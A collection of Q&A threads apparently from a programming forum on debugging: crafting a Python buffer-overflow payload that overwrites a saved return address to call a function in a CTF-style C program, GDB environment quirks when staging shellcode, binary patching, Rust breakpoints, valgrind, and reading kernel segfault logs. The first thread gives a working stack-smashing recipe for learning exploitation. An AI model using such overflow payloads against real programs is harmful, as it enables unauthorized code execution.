How to generate payload with python for buffer overflow?

I'm trying to trigger a buffer overflow in order to execute a function in a C program. So far I have found the number of bytes needed to overwrite the saved EBP. The next step is to overwrite the saved return address, which ends up in EIP, with the address of the function I want to execute. I'm trying to generate this payload with Python, using the following:
python -c 'print "A"*112 + "\x3b\x86\x04\x08"' > attack_payload
This is what I get
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA;�
Notice those last characters! I know that's not what I was supposed to get. The address I want in the EIP register is 0804863b, which I wrote in little-endian order for the exploit to work properly. Any comments on this?

First verify that you control EIP. Generate this payload:
python -c 'print "A"*112 + "B"*4' > attack_payload
Then run the program with it under the debugger and check that you control the PC (EIP=42424242):
(gdb) r < attack_payload
If you do, replace the "BBBB" with your address, 0804863b:
python -c 'print "A"*112 + "\x3b\x86\x04\x08"' > attack_payload
That is all; just make sure you verify first that you control EIP.
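The trailing `;�` in the question's output is what those four bytes look like on a terminal: 0x3b is the printable character `;`, while 0x86, 0x04 and 0x08 are not printable. As a minimal sketch in Python 3 (the helper name `build_payload` is hypothetical, not from the original post), the same bytes can be produced with `struct.pack` and inspected as hex rather than by eye:

```python
import struct

def build_payload(offset, address):
    """Return `offset` filler bytes followed by a 32-bit little-endian address."""
    return b"A" * offset + struct.pack("<I", address)

payload = build_payload(112, 0x0804863B)

# Inspect the tail as hex instead of relying on how a terminal renders it.
print(payload[-4:].hex())  # 3b860408

# Write raw bytes; binary mode adds no newline and performs no text encoding.
with open("attack_payload", "wb") as f:
    f.write(payload)
```

Writing bytes explicitly matters in Python 3, where printing the text character `\x86` to a UTF-8 terminal emits two bytes instead of one.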
More info (now that I have seen the source code): for a simpler walkthrough, compile with the following command:
gcc -o main main.c -fno-stack-protector -g -m32
Run it under the debugger (gdb ./main) and set the following breakpoint:
gef➤ b 13
Breakpoint 2 at 0x8048611: file main.c, line 13.
Continue and enter the following payload:
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACCCC
Step forward to the ret instruction:
→ 0x804862d <stringLength+60> ret
You can see that you now control the return address:
gef➤ bt
#0 0x0804862d in stringLength () at main.c:14
#1 0x43434343 in ?? ()
#2 0x08048800 in ?? ()
Backtrace stopped: previous frame inner to this frame (corrupt stack?)
gef➤ x/x $sp
0xffffd5ec: 0x43434343
Now you can replace "CCCC" with the address of the win function
gef➤ p win
$1 = {void ()} 0x80485dd <win>
You can automate all of this with a simple Python script (have a look at the pwntools library). Your payload will be:
payload = "A" * 112
payload += "\xdd\x85\x04\x08"
Alternatively, you can run:
python -c 'print "1"+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+"\xdd\x85\x04\x08"' | ./main
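As a rough sketch of the scripted variant using only the standard library (Python 3), the payload can be piped to a process with `subprocess.run`. The function name `run_with_payload` and the echoing stand-in target are assumptions made for illustration; for the real program the command would be `["./main"]`, and any input the program expects before the overflow would need to be prepended.

```python
import subprocess
import sys

def run_with_payload(command, payload):
    """Run `command`, send `payload` on stdin, and return the completed process."""
    return subprocess.run(command, input=payload, capture_output=True)

# Stand-in target that echoes stdin back; replace with ["./main"] for the real binary.
echo_target = [
    sys.executable, "-c",
    "import sys; sys.stdout.buffer.write(sys.stdin.buffer.read())",
]

# 112 filler bytes followed by the address of win (0x080485dd), little-endian.
payload = b"A" * 112 + (0x080485DD).to_bytes(4, "little")

result = run_with_payload(echo_target, payload)
print(result.returncode, len(result.stdout))
```

A negative `returncode` from the real binary would indicate it was killed by a signal, which is a quick way to tell a crash from a clean exit.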

Related

Differences in environment layout with and without GDB

Recently I have been working on CTF challenges that require the attacker to stage shellcode in the environment. With ASLR disabled, one can rely on only slight differences between the environment of the shell, for example, and that of the exploitable process (e.g. differences due only to binary name differences). However, GDB (and R2) will make slight changes to the environment that make this very hard to do due to the environment variables shifting around slightly when not being debugged.
For example, GDB seems to at least add the environment variables LINES and COLUMNS. However, these can be removed by invoking GDB as follows:
gdb -ex 'set exec-wrapper env -u LINES -u COLUMNS' -ex 'r < exploit.input' challenge.bin
Note that GDB will implicitly use the fully qualified path when debugging a binary, so the user can further decrease any differences by invoking the binary in a similar manner.
`pwd`/challenge.bin < exploit.input
However, there still appear to be some differences. Many times I have been able to get an exploit working in GDB, only to have it crash when run without the debugger. I've read mentions of a script (sometimes referred to as setenv.sh) that can (allegedly) be used to set up an environment exactly like GDB's, but I have not been able to find it.
Looking at the env of the shell:
LANG=en_US.UTF-8
PROFILEHOME=
DISPLAY=:0
OLDPWD=/home/user
SHELL_SESSION_ID=e7a0e681012e480fb044a034a775bb83
INVOCATION_ID=8ef3be94d09f4e47a0322ddf0d6ed787
COLORTERM=truecolor
MOZ_PLUGIN_PATH=/usr/lib/mozilla/plugins
XDG_VTNR=1
XDG_SESSION_ID=c1
USER=user
PWD=/test
HOME=/home/user
JOURNAL_STREAM=9:15350
KONSOLE_DBUS_SESSION=/Sessions/1
KONSOLE_DBUS_WINDOW=/Windows/1
GTK_MODULES=canberra-gtk-module
MAIL=/var/spool/mail/user
WINDOWPATH=1
TERM=xterm-256color
SHELL=/bin/bash
KONSOLE_DBUS_SERVICE=:1.7
KONSOLE_PROFILE_NAME=Profile 1
SHELLCODE=����
XDG_SEAT=seat0
SHLVL=4
COLORFGBG=15;0
LANGUAGE=
WINDOWID=16777222
LOGNAME=user
DBUS_SESSION_BUS_ADDRESS=unix:path=/run/user/1000/bus
XDG_RUNTIME_DIR=/run/user/1000
XAUTHORITY=/home/user/.Xauthority
PATH=/usr/local/sbin:/usr/local/bin:/usr/bin:/usr/bin/site_perl:/usr/bin/vendor_perl:/usr/bin/core_perl
_=/usr/bin/env
And comparing it to that of GDB (LINES and COLUMNS removed):
/test/challenge.bin
_=/usr/bin/gdb
LANG=en_US.UTF-8
DISPLAY=:0
PROFILEHOME=
OLDPWD=/home/user
SHELL_SESSION_ID=e7a0e681012e480fb044a034a775bb83
INVOCATION_ID=8ef3be94d09f4e47a0322ddf0d6ed787
COLORTERM=truecolor
MOZ_PLUGIN_PATH=/usr/lib/mozilla/plugins
XDG_VTNR=1
XDG_SESSION_ID=c1
USER=user
PWD=/test
HOME=/home/user
JOURNAL_STREAM=9:15350
KONSOLE_DBUS_SESSION=/Sessions/1
KONSOLE_DBUS_WINDOW=/Windows/1
GTK_MODULES=canberra-gtk-module
MAIL=/var/spool/mail/user
WINDOWPATH=1
SHELL=/bin/bash
TERM=xterm-256color
KONSOLE_DBUS_SERVICE=:1.7
KONSOLE_PROFILE_NAME=Profile 1
SHELLCODE=����
COLORFGBG=15;0
SHLVL=4
XDG_SEAT=seat0
LANGUAGE=
WINDOWID=16777222
LOGNAME=user
DBUS_SESSION_BUS_ADDRESS=unix:path=/run/user/1000/bus
XDG_RUNTIME_DIR=/run/user/1000
XAUTHORITY=/home/user/.Xauthority
PATH=/usr/local/sbin:/usr/local/bin:/usr/bin:/usr/bin/site_perl:/usr/bin/vendor_perl:/usr/bin/core_perl
/test/challenge.bin
One can see the environments are not very different on inspection. Notably, the GDB env seems to have a second instance of the debugged binary's name (e.g. challenge.bin, in this case), as well as the fact that it sets _ to GDB rather than the debugged binary. The offsets seem to be way off, even when taking these small changes into account.
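Comparing two long dumps by eye is error-prone, so a small script can help. The following is a sketch, assuming each dump is plain `env`-style text; `parse_env` and `diff_env` are hypothetical helper names, and the two short inputs are abbreviated from the listings above.

```python
def parse_env(dump):
    """Parse `env`-style output into a dict, skipping lines without '='."""
    env = {}
    for line in dump.splitlines():
        if "=" in line:
            key, _, value = line.partition("=")
            env[key] = value
    return env

def diff_env(a, b):
    """Return (only_in_a, only_in_b, changed) for two environment dicts."""
    only_a = sorted(set(a) - set(b))
    only_b = sorted(set(b) - set(a))
    changed = sorted(k for k in set(a) & set(b) if a[k] != b[k])
    return only_a, only_b, changed

shell_env = parse_env("PWD=/test\nSHLVL=4\n_=/usr/bin/env\n")
gdb_env = parse_env("/test/challenge.bin\n_=/usr/bin/gdb\nPWD=/test\nSHLVL=4\n")

print(diff_env(shell_env, gdb_env))
```

This only compares names and values. The two listings also differ in the order of some variables, which a dict comparison does not capture and which may matter for where each string ends up on the stack.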
TL;DR
How can the GDB environment differences be nulled out for the case when it is necessary to know a priori the locations of things in the environment with and without the debugger running?
In the interest of laziness, has anyone fully characterized the environment with and without GDB, or the changes GDB makes?
And for those interested, R2 appears to make changes to PATH. There may also be other differences.

How can the GDB environment differences be nulled out
One way is to run the binary outside of GDB (have the binary wait for GDB to attach, as described here), and attach GDB to it from "outside".
Update:
the binary in question is part of a challenge and source is not provided
You can patch _start with a jmp _start (so the binary will never progress past the first instruction). Once attached, replace the jmp with the original instruction, and start debugging.
Update 2:
Are you familiar with a better process?
In order to find offset of a given function in the ELF file, you need two values: offset of the function within section, and offset of section within the file.
For example:
$ readelf -Ws a.out | grep ' _start'
58: 00000000004003b0 43 FUNC GLOBAL DEFAULT 11 _start
This tells you that _start is linked at 0x4003b0 in section 11.
What is that section, what is its starting address, and where in the file does it start?
$ readelf -WS a.out | grep '\[11\]'
[11] .text PROGBITS 00000000004003b0 0003b0 000151 00 AX 0 0 16
We now see that _start is at the very start of .text (this is usually the case), and that .text starts at offset 0x3b0 in the file. QED.
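The arithmetic above, and the byte patch it enables, can be sketched in Python. The helper names are hypothetical, and the demonstration deliberately runs on a scratch file rather than a real binary. The bytes `eb fe` encode an x86 short jump to itself, which is one way to realize the `jmp _start` idea.

```python
import os
import tempfile

def file_offset(symbol_addr, section_addr, section_file_offset):
    """Translate a linked virtual address into an offset within the ELF file."""
    return symbol_addr - section_addr + section_file_offset

def patch_bytes(path, offset, new_bytes):
    """Overwrite bytes at `offset`; return the original bytes for later restore."""
    with open(path, "r+b") as f:
        f.seek(offset)
        original = f.read(len(new_bytes))
        f.seek(offset)
        f.write(new_bytes)
    return original

# Values taken from the readelf output above.
offset = file_offset(0x4003B0, 0x4003B0, 0x3B0)
print(hex(offset))  # 0x3b0

# Scratch file standing in for a.out: padding, then the first bytes of _start.
with tempfile.NamedTemporaryFile(delete=False) as tmp:
    tmp.write(b"\x00" * 0x3B0 + b"\x31\xed\x49\x89")
scratch = tmp.name

saved = patch_bytes(scratch, offset, b"\xeb\xfe")  # jump-to-self
print(saved.hex())  # 31ed
os.remove(scratch)
```

Keeping the returned original bytes makes it straightforward to restore the instruction from the debugger once attached.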
An even better process is to use GDB to perform the patching (GDB will do all the offset finding). Suppose I want to overwrite the first instruction of _start with a 0xCC instruction:
$ gdb --write -q ./a.out
Reading symbols from ./a.out...done.
Let's look at the original instructions first:
(gdb) x/4i _start
0x4003b0 <_start>: xor %ebp,%ebp
0x4003b2 <_start+2>: mov %rdx,%r9
0x4003b5 <_start+5>: pop %rsi
0x4003b6 <_start+6>: mov %rsp,%rdx
Now let's patch the first one:
(gdb) set *(char*)0x4003b0 = 0xCC
(gdb) x/4i _start
0x4003b0 <_start>: int3
0x4003b1 <_start+1>: in (%dx),%eax
0x4003b2 <_start+2>: mov %rdx,%r9
0x4003b5 <_start+5>: pop %rsi
(gdb) quit
Segmentation fault (core dumped) <<-- this is a GDB bug. I should fix it some day.
$ objdump -d a.out
...
Disassembly of section .text:
00000000004003b0 <_start>:
4003b0: cc int3 <<-- success!
4003b1: ed in (%dx),%eax
4003b2: 49 89 d1 mov %rdx,%r9
...
Voila!

Unable to set a breakpoint on main while debugging a program compiled with Rust 1.10 with GDB

I'm trying to step through this:
fn main() {
println!("Hello {}", 0);
}
I've tried compiling with both: cargo build and rustc -g -L src/main.rs
I then run gdb target/debug/rust-gdb-test (or gdb main), and try to set a breakpoint on main with break main.
(break ::rust-gdb-test::main returns Function "::rust-gdb-test" not defined.).
After breaking (Breakpoint 1, 0x0000555555559610 in main ()) if I try to run list, I get:
1 dl-debug.c: No such file or directory.
I am running Rust 1.10.0 (cfcb716cf 2016-07-03) and GDB 7.7.1 (Debian 7.7.1+dfsg-5).
A similar question was asked 2 years ago, but I couldn't make the solutions presented there to work.

Note: I seem to not have GDB installed anymore, only LLDB, but for this question the answer is the same.
The main that you see in Rust is not the same main that exists in the compiled binary. Specifically, there are a number of shim methods between the two. The Rust main actually includes the crate name (in my example buggin) and a hash (in my case hfe08615ed561bb88):
* frame #0: 0x000000010000126d buggin`buggin::main::hfe08615ed561bb88 + 29 at main.rs:2
frame #1: 0x000000010000810e buggin`std::panicking::try::call::hbbf4746cba890ca7 + 30
frame #2: 0x000000010000aadc buggin`__rust_try + 12
frame #3: 0x000000010000aa76 buggin`__rust_maybe_catch_panic + 38
frame #4: 0x0000000100007f32 buggin`std::rt::lang_start::hbcefdc316c2fbd45 + 562
frame #5: 0x00000001000013aa buggin`main + 42
frame #6: 0x00007fff910435ad libdyld.dylib`start + 1
frame #7: 0x00007fff910435ad libdyld.dylib`start + 1
Here, you can see that main is a few frames away in the stack.
I tend to use a wildcard breakpoint to not deal with the hash:
(lldb) br set -r 'buggin::main.*'
Breakpoint 5: where = buggin`buggin::main::hfe08615ed561bb88 + 29, address = 0x000000010000126d
rbreak should be an equivalent in GDB.
Once the program is stopped, you should be able to see the source. You may also be interested in the rust-lldb and rust-gdb wrappers that ship with Rust and improve the experience a bit.
This is basically the same as this answer, but mentions the hash.
Neither (gdb) rbreak 'rust-gdb-test::main.*' nor (lldb) br set -r 'rust-gdb-test::main.*' set any breakpoints for me.
The hyphen (-) is not a valid symbol character. When compiled, it is converted to an underscore.
My original methodology was actually this:
(lldb) br set -r '.*main.*'
Breakpoint 2: 67 locations.
You can then run the program and continue a few times until you find the right place. Don't be afraid to get in there and explore a bit; it's just a debugger!
You could try various versions of the regex to see if anything interesting might match:
(lldb) br set -r '.*main::.*'
Breakpoint 3: where = rust-gdb-test`rust_gdb_test::main::h97d2ac6fea75a245 + 29,
(lldb) br set -r '.*::main.*'
Breakpoint 4: where = rust-gdb-test`rust_gdb_test::main::h97d2ac6fea75a245 + 29,
You could also call a function with a very unique name from main and set a breakpoint on that:
(lldb) br set -r '.*a_really_unique_name.*'
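To illustrate the hyphen-to-underscore point, here is a tiny sketch that builds the breakpoint regex from a crate name. The function name is hypothetical, and the pattern simply mirrors the `crate::main.*` form used above.

```python
def main_breakpoint_regex(crate_name):
    """Build a regex for `rbreak` or `br set -r` matching the crate's Rust main."""
    # Hyphens in the crate name become underscores in compiled symbol names.
    symbol_crate = crate_name.replace("-", "_")
    return symbol_crate + "::main.*"

print(main_breakpoint_regex("rust-gdb-test"))  # rust_gdb_test::main.*
```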

GDB not seeing correct function argument values even though they are set

First time trying to debug on a quad-core Xeon after 15 years of successful x86 GDB use.
Linux DellT3500 3.16.0-23-generic #31-Ubuntu SMP Tue Oct 21 17:56:17 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
GNU gdb (Ubuntu 7.8-1ubuntu4) 7.8.0.20141001-cvs
g++ compiler flags:
-Wall -Wwrite-strings -Wchar-subscripts -Wparentheses -gstabs+ -DLINUX -O0
Setting a breakpoint in a certain class member function shows this=0x0 and the other parameter incorrectly when the breakpoint happens. But inserting a printf in the code right after that shows that this and the parameter are actually set correctly:
Breakpoint 1, PlayGamePage::actionPerformed (this=0x0, inTarget=0x7fffffffdf90)
at PlayGamePage.cpp:725
725 printf( "hey, this = %x, inTarget = %x\n", this );
(gdb) next
hey, this = b6cc50, inTarget = b6ce18
727 if( inTarget == &mCommitButton &&
(gdb) print this
$1 = (PlayGamePage * const) 0x0
(gdb) print inTarget
$2 = (GUIComponent *) 0x7fffffffdf90
(gdb)
As you can see, GDB can't print these values correctly, even though they are set and the code can print them with printf. This is a big problem, because it means GDB cannot print member variables.
Also, the rest of the function body uses this extensively and inTarget extensively (accessing class members and testing inTarget), and the code functions as expected. No crashes or misbehavior, so this is set correctly in the code, but GDB can't see it.
Going up the stack:
(gdb) up
#1 0x000000000040a11f in ActionListenerList::fireActionPerformed (
this=0xb6cf98, inTarget=0xb6cf48)
at ../../minorGems/ui/event/ActionListenerList.h:134
134 listener->actionPerformed( inTarget );
See that inTarget matches what printf sees down in the actionPerformed function body. Also, gdb can print these values fine at this point:
(gdb) print inTarget
$5 = (GUIComponent *) 0xb6cf48
(gdb) print listener
$6 = (ActionListener *) 0xb6ce18
listener should match this down in the function body, and it does according to printf, but gdb sees this=0x0 instead.
Yes, this is a virtual function that is being called (PlayGamePage implements the ActionListener interface, overriding the actionPerformed virtual function).
I just placed a breakpoint in exactly the same code in GDB on 32-bit x86, and it sees both this and inTarget correctly and can print them correctly, with values matching what the code's printf shows.

This is either a bug in your GCC (which version are you using?) or a bug in GDB.
Since you are apparently running an old CVS snapshot of GDB, I suggest first trying a stable GDB release instead.

How can I use a variable name instead of addresses when debugging valgrind runs with gdb?

Let's say I'm debugging with valgrind and gdb by doing:
$ valgrind --vgdb-error=0 ./magic
...and then in a second terminal:
$ gdb ./magic
...
(gdb) target remote | /usr/lib/valgrind/../../bin/vgdb
If I want to examine the defined-ness of some memory, I can use:
(gdb) p &batman
$1 = (float *) 0xffeffe20c
(gdb) p sizeof(batman)
$2 = 4
(gdb) monitor get_vbits 0xffeffe20c 4
ffffffff
Using three commands to do one thing is kind of annoying, especially since I usually want to do this a few times for many different variables in the same stack frame. But if I try the obvious thing, I get:
(gdb) monitor get_vbits &batman sizeof(batman)
missing or malformed address
Is it possible to get gdb to evaluate &batman and sizeof(batman) on the same line as my monitor command?

But if I try the obvious thing, I get: missing or malformed address
This is from GDB doc (http://sourceware.org/gdb/onlinedocs/gdb/Connecting.html#index-monitor-1210) for the monitor cmd:
monitor cmd
This command allows you to send arbitrary commands
directly to the remote monitor. Since gdb doesn't care about the
commands it sends like this, this command is the way to extend gdb—you
can add new commands that only the external monitor will understand
and implement.
As you can see "gdb doesn't care about the commands it sends like this". It probably means that the command after monitor is not processed in any way and sent AS IS.
What you can do to evaluate your variable on the same line is to use user-defined commands in gdb (http://sourceware.org/gdb/onlinedocs/gdb/Define.html). Define your own command and use the eval gdb command to build the monitor command with the necessary values (http://sourceware.org/gdb/current/onlinedocs/gdb/Output.html#index-eval-1744):
define monitor_var
eval "monitor get_vbits %p %d", &$arg0, sizeof($arg0)
end
And then use it like this:
(gdb) monitor_var batman

How do you read a segfault kernel log message

This may be a very simple question. I am attempting to debug an application which generates the following segfault error in kern.log:
kernel: myapp[15514]: segfault at 794ef0 ip 080513b sp 794ef0 error 6 in myapp[8048000+24000]
Here are my questions:
Is there any documentation on what the different error numbers on a segfault mean? In this instance it is error 6, but I've also seen error 4 and 5.
What is the meaning of the information at bf794ef0 ip 0805130b sp bf794ef0 and myapp[8048000+24000]?
So far I was able to compile with symbols, and when I do x 0x8048000+24000 it returns a symbol. Is that the correct way of doing it? My assumptions thus far are the following:
sp = stack pointer?
ip = instruction pointer
at = ????
myapp[8048000+24000] = address of symbol?

When the report points to a program, not a shared library
Run addr2line -e myapp 080513b (and repeat for the other instruction pointer values given) to see where the error is happening. Better, get a debug-instrumented build, and reproduce the problem under a debugger such as gdb.
If it's a shared library
In the libfoo.so[NNNNNN+YYYY] part, the NNNNNN is where the library was loaded. Subtract this from the instruction pointer (ip) and you'll get the offset into the .so of the offending instruction. Then you can use objdump -DCgl libfoo.so and search for the instruction at that offset. You should easily be able to figure out which function it is from the asm labels. If the .so doesn't have optimizations you can also try using addr2line -e libfoo.so <offset>.
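The subtraction described above can be sketched as a small log parser. The bracketed pair is the mapping's start address and its size, both in hexadecimal. The regular expression and the name `parse_segfault` are assumptions made for this example, and the sample line uses the full values quoted in the question.

```python
import re

SEGFAULT_RE = re.compile(
    r"segfault at (?P<addr>[0-9a-f]+) ip (?P<ip>[0-9a-f]+) "
    r"sp (?P<sp>[0-9a-f]+) error (?P<error>\d+) "
    r"in (?P<module>[^\[]+)\[(?P<base>[0-9a-f]+)\+(?P<size>[0-9a-f]+)\]"
)

def parse_segfault(line):
    """Extract the fields of a kernel segfault line; return None if no match."""
    match = SEGFAULT_RE.search(line)
    if match is None:
        return None
    fields = match.groupdict()
    for key in ("addr", "ip", "sp", "base", "size"):
        fields[key] = int(fields[key], 16)
    fields["error"] = int(fields["error"])
    # Offset of the faulting instruction within the mapped object.
    fields["offset"] = fields["ip"] - fields["base"]
    return fields

line = ("kernel: myapp[15514]: segfault at bf794ef0 ip 0805130b "
        "sp bf794ef0 error 6 in myapp[8048000+24000]")
info = parse_segfault(line)
print(info["module"], hex(info["offset"]))  # myapp 0x930b
```

For a shared library, the resulting offset is the value to look up in the objdump or addr2line output.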
What the error means
Here's the breakdown of the fields:
address - the location in memory the code is trying to access (it's likely that 10 and 11 are offsets from a pointer we expect to be set to a valid value but which is instead pointing to 0)
ip - instruction pointer, ie. where the code which is trying to do this lives
sp - stack pointer
error - Architecture-specific flags; see arch/*/mm/fault.c for your platform.

Based on my limited knowledge, your assumptions are correct.
sp = stack pointer
ip = instruction pointer
myapp[8048000+24000] = address
If I were debugging the problem I would modify the code to produce a core dump or log a stack backtrace on the crash. You might also run the program under (or attach) GDB.
The error code is just the architectural error code for page faults and seems to be architecture specific. They are often documented in arch/*/mm/fault.c in the kernel source. My copy of Linux/arch/i386/mm/fault.c has the following definition for error_code:
bit 0 == 0 means no page found, 1 means protection fault
bit 1 == 0 means read, 1 means write
bit 2 == 0 means kernel, 1 means user-mode
My copy of Linux/arch/x86_64/mm/fault.c adds the following:
bit 3 == 1 means fault was an instruction fetch
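The bit definitions above can be applied mechanically. This is a minimal sketch, assuming the x86 layout just quoted; the function name and dictionary keys are made up for the example.

```python
def decode_page_fault_error(code):
    """Decode an x86 page-fault error code using the bit meanings listed above."""
    return {
        "protection_fault": bool(code & 1),   # bit 0: 0 means no page found
        "write": bool(code & 2),              # bit 1: 0 means read
        "user_mode": bool(code & 4),          # bit 2: 0 means kernel
        "instruction_fetch": bool(code & 8),  # bit 3: fault was an instruction fetch
    }

for code in (4, 5, 6):
    print(code, decode_page_fault_error(code))
```

Under this reading, error 6 is a user-mode write to an address with no page mapped, while error 4 is the corresponding read.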

If it's a shared library
You're hosed, unfortunately; it's not possible to know where the
libraries were placed in memory by the dynamic linker after-the-fact.
Well, there is still a possibility to retrieve the information, not from the binary, but from the object. But you need the base address of the object. And this information still is within the coredump, in the link_map structure.
So first you want to import struct link_map into GDB. Let's compile a small program that uses it with debug symbols and add it to GDB.
link.c
#include <link.h>
toto(){struct link_map * s = 0x400;}
get_baseaddr_from_coredump.sh
#!/bin/bash
BINARY=$(which myapplication)
IsBinPIE ()
{
readelf -h $1|grep 'Type' |grep "EXEC">/dev/null || return 0
return 1
}
Hex2Decimal ()
{
export number="`echo "$1" | sed -e 's:^0[xX]::' | tr '[a-f]' '[A-F]'`"
export number=`echo "ibase=16; $number" | bc`
}
GetBinaryLength ()
{
if [ $# != 1 ]; then
echo "Error, no argument provided"
fi
IsBinPIE $1 || (echo "ET_EXEC file, need a base_address"; exit 0)
export totalsize=0
# Get PT_LOAD's size segment out of Program Header Table (ELF format)
export sizes="$(readelf -l $1 |grep LOAD |awk '{print $6}'|tr '\n' ' ')"
for size in $sizes
do Hex2Decimal "$size"; export totalsize=$(expr $number + $totalsize); export totalsize=$(expr $number + $totalsize)
done
return $totalsize
}
if [ $# = 1 ]; then
echo "Using binary $1"
IsBinPIE $1 && (echo "NOT ET_EXEC, need a base_address..."; exit 0)
BINARY=$1
fi
gcc -g3 -fPIC -shared link.c -o link.so
GOTADDR=$(readelf -S $BINARY|grep -E '\.got.plt[ \t]'|awk '{print $4}')
echo "First do the following command :"
echo file $BINARY
echo add-symbol-file ./link.so 0x0
read
echo "Now copy/paste the following into your gdb session with attached coredump"
cat <<EOF
set \$linkmapaddr = *(0x$GOTADDR + 4)
set \$mylinkmap = (struct link_map *) \$linkmapaddr
while (\$mylinkmap != 0)
if (\$mylinkmap->l_addr)
printf "add-symbol-file .%s %#.08x\n", \$mylinkmap->l_name, \$mylinkmap->l_addr
end
set \$mylinkmap = \$mylinkmap->l_next
end
EOF
This prints the whole link_map content as a set of GDB commands.
In itself this might seem unnecessary, but with the base address of the shared object in question, you can get more information out of an address by debugging the involved shared object directly in another GDB instance.
Keep the first GDB session around to have an idea of the symbols.
NOTE: the script is rather incomplete. I suspect you may need to add the following value to the second parameter of each printed add-symbol-file command:
readelf -S $SO_PATH|grep -E '\.text[ \t]'|awk '{print $5}'
where $SO_PATH is the first argument of the add-symbol-file
Hope it helps
